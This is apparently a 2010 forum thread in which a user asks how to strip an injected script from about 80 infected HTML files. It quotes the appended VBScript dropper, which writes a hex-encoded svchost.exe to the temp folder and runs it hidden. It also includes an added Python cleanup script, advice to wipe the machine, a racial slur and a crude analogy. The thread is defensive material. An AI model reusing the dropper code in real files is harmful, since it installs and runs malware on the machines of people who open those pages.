Script to delete all code from file from * onwards?

-joe-
May 6, 2010
Hi there,

Stupidly, I was tired this morning, so I clicked "stop blocking" when Windows Firewall came up with something about Firefox.

As a result, I now have a virus. I think I've removed it, but it'll reactivate if I open the html files it's infected.

What it's done is fairly obvious, at the end of the html files, it's left <SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000loadsmorecodehere"

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=True Then
FSO.DeleteFile(DropPath)
End If
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
End If
//--></SCRIPT><!--
[followed by a long run of unreadable binary garbage]



So, I have the list of the html files infected. Is it possible to make a vb file or something that'd delete everything from "<SCRIPT Language" onwards in ~80 html files? I had a look online, but couldn't find any solutions. :(

I know it's a bit different from the usual posts here, but hopefully this should be fairly simple?

Tits:

Tm0Wn.jpg
 


DON'T DO WHAT ANYONE ELSE SUGGESTS

You have probably not deleted the virus. Wipe your PC. Back up the important shit, DO NOT BACK UP THE INFECTED SHIT EVEN IF YOU NEED IT AND THINK YOU CLEANED IT, and wipe your PC. Consider dumping the PC in the trash and getting a new one, because hardware-level rootkits are a reality.

It's 2011, nigga, and I don't know enough about writing viruses to trust myself cleaning them off machines that are critical to my business and welfare, and (judging by nature of your question) you know even less than I do, so take my advice. At the very least, assume your whole OS is compromised, and assume you cannot recover it.

If I ever write software to leverage compromised machines ("a virus"), the first thing I'll do is add a file "virus.exe" to your desktop, hoping people delete this icon and feel placated. It would be stupid to assume any fix you "figured out" is good enough.
 
Hope this gives you some perspective -- Here's the fictional scenario that came to mind after reading your post.

"I think I might have AIDS because I slept with a South African whore, and the condom broke, but I pulled out and duct-taped it back together before finishing. Actually, I know I don't have AIDS, because she died the next morning of a drug overdose, not AIDS, and my heroin dealer was still willing to share a needle with me. He said 'Hey man, I won't do that, you might have AIDS. Aww, what the hell, I don't think you have AIDS, let's shoot up', and he's a professional drug dealer, so I trust what he has to say. I don't think I'll get tested for AIDS, and instead will be hosting an open-invitation unprotected sex party in my basement tonight for all to attend."

If you're smart, right now, you'll realize that an attacker had an unknown-degree-of-access to your compromised machine, and you'll assume you have AIDS.
 
^ This.

Just think about it for a second. I don't know about you, but imagine if you knew your PC was infected with an unknown virus and didn't have a clue what it does; wouldn't you be worried that everything is being compromised? Every single thing you type, every username, password, bank login, PayPal, Google, Facebook.

I know I'd do a full fucking wipe of that shit and start over.
 
Better yet, go spend less than $100 and put a new hard drive in your computer. Then you can back up your data at your leisure and know that you did not lose something important by forgetting to back it up.
 
> DON'T DO WHAT ANYONE ELSE SUGGESTS
>
> You have probably not deleted the virus. Wipe your PC. Back up the important shit, DO NOT BACK UP THE INFECTED SHIT EVEN IF YOU NEED IT AND THINK YOU CLEANED IT, and wipe your PC.

Agreed, delete the infected files, back up everything else and wipe the system.

> Consider dumping the PC in the trash and getting a new one, because hardware-level rootkits are a reality.

This is just fear mongering. Hardware rootkits are "experimental" at this phase because they have to be written for specific hardware (i.e. his exact video card brand/model) to work. It's highly improbable that a virus has been written for his exact hardware configuration. Actually it's more probable that the first wide-scale use of hardware rootkits will attack Mac-based computers due to the limited number of hardware configurations available.

> It's 2011, nigga, and I don't know enough about writing viruses to trust myself cleaning them off machines that are critical to my business and welfare, and (judging by the nature of your question) you know even less than I do, so take my advice. At the very least, assume your whole OS is compromised, and assume you cannot recover it.

Agreed, delete infected files if your virus scanner won't clean them. Back up only critical items and wipe the drive. Install a good AV like Nod32 or Kaspersky and scan the backed-up files before restoring them.

> If I ever write software to leverage compromised machines ("a virus"), the first thing I'll do is add a file "virus.exe" to your desktop, hoping people delete this icon and feel placated. It would be stupid to assume any fix you "figured out" is good enough.

Most viruses are very poorly written; they "take over" your system. They screw with your Internet settings, you can't get access to the Control Panel, user permissions are modified and other very annoying things. It would still be obvious to the end user that they are infected. So your "virus" would need to be a little more covert than the crap you see in the wild today.
 
Thanks for the replies everyone. I've scanned at boot time with Avast, and also run HitmanPro (which is probably the best scanner out there). I know they usually leave traces, but there have been a LOT of infected files cleared out, and I think it's been gotten rid of. I also cleared up the startup and services in msconfig. Before, it would occasionally change Google search to some paid search, and stop me getting on certain websites (as well as all the standard control panel/permissions stuff). That's no longer happening. I also looked up the virus, seems I'm not gonna get spied on or anything - this is a major IRC botnet, so the worst that's gonna happen if it is still there is probably just some internet slowing from being used for bulk email/DDoSing.

There's one element I haven't removed yet, I haven't replaced svchost.exe, but I'll have to go back into safe mode for that, so I'll do it later.

Is there any way at all to do this? :( *even if I have to reformat, I still want to keep these html files, they're pretty important. I don't want all this crap in them though*
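A cleanup script of the kind asked for in the first post and again just above, written as an added example rather than anything posted in the thread. It assumes the marker is the <SCRIPT Language=VBScript> tag quoted in the first post, that the files end in .htm or .html, and that nothing legitimate follows the marker (the post says the block was appended at the end). It reads each file as raw bytes, so the VBScript is never interpreted, keeps a copy of every infected original under a backup directory, and truncates at the first marker, so a file that was re-infected and carries two copies of the block is cleaned in one pass. The sample files inside run_demo() are constructed for the demo, not real infected pages.

```python
"""Remove an appended <SCRIPT Language=VBScript> dropper from HTML files.

Added example for this thread, not code posted by anyone in it. Assumes the
infection only appended the script block to the end of each file, so every
byte from the first marker onwards can be discarded.
"""
import re
import shutil
import tempfile
from pathlib import Path
from typing import List, Tuple

# The opening tag quoted in the first post. Matched on raw bytes, case-insensitively,
# because the appended tail is binary garbage that need not be valid text.
INJECTED_MARKER = re.compile(rb"<SCRIPT\s+Language=VBScript>", re.IGNORECASE)
HTML_SUFFIXES = (".htm", ".html")

# Constructed sample inputs for the demo below (not real infected files).
SAMPLE_INFECTED = (
    b"<html><body><p>Original page</p></body></html>\n"
    b"<SCRIPT Language=VBScript><!--\n"
    b'DropFileName = "svchost.exe"\n'
    b"//--></SCRIPT><!--\xff\xfe\x83\xd5 binary tail"
)
SAMPLE_CLEAN = b"<html><body><p>Nothing appended here</p></body></html>\n"


def strip_injected_script(html: bytes) -> Tuple[bytes, bool]:
    """Return (cleaned, changed): the bytes before the first marker, or the input unchanged."""
    match = INJECTED_MARKER.search(html)
    if match is None:
        return html, False
    return html[: match.start()], True


def clean_file(path: Path, root: Path, backup_dir: Path) -> bool:
    """Clean one file in place; the infected original is copied under backup_dir first."""
    cleaned, changed = strip_injected_script(path.read_bytes())
    if not changed:
        return False
    rel = path.relative_to(root)
    backup = backup_dir / rel.with_name(rel.name + ".infected")
    backup.parent.mkdir(parents=True, exist_ok=True)
    shutil.copy2(path, backup)  # keep the evidence, never overwrite it
    path.write_bytes(cleaned)
    return True


def clean_tree(root: Path, backup_dir: Path) -> List[Path]:
    """Clean every .htm/.html file under root; returns the files that were modified."""
    modified = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in HTML_SUFFIXES:
            continue
        if backup_dir in path.parents:  # never touch the backups themselves
            continue
        if clean_file(path, root, backup_dir):
            modified.append(path)
    return modified


def run_demo() -> dict:
    """Build a throwaway directory with the constructed samples, clean it, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sub").mkdir()
        (root / "index.html").write_bytes(SAMPLE_INFECTED)
        (root / "clean.htm").write_bytes(SAMPLE_CLEAN)
        # Different tag casing and spacing, as later re-infections may vary.
        (root / "sub" / "page.HTML").write_bytes(b"<p>x</p><script  language=VBSCRIPT>junk")
        backups = root / "_infected_backups"
        first = [p.relative_to(root).as_posix() for p in clean_tree(root, backups)]
        second = clean_tree(root, backups)  # must be a no-op on already-cleaned files
        return {
            "cleaned": first,
            "second_run": len(second),
            "index": (root / "index.html").read_bytes(),
            "page": (root / "sub" / "page.HTML").read_bytes(),
            "clean": (root / "clean.htm").read_bytes(),
            "backup": (backups / "index.html.infected").read_bytes(),
        }


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = Path(sys.argv[1])
        for p in clean_tree(target, target / "_infected_backups"):
            print("cleaned", p)
    else:
        print(run_demo()["cleaned"])
```

Run it from a known-clean machine against a copy of the files (python clean_html.py path/to/html), never by opening the infected pages on the affected Windows box, since Internet Explorer or Windows Script Host would execute the dropper on open. The .infected backups still carry the dropper and should be deleted once the cleaned pages have been checked. The matcher is deliberately specific to the quoted tag, so a file with a differently labelled injection is left untouched and will simply not appear in the list of modified files.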
 
Cheers for that onigen, I'll have a look on there :) +rep EDIT:[toomuchrepinpast24hours]

And dchuk, I would, but Macs = no compatibility with loads of software, no games (except like pinball lol), and overpriced.

Linux would be a good option (dualbooted with windows for games) but again, there's compatibility issues, especially with network cards :(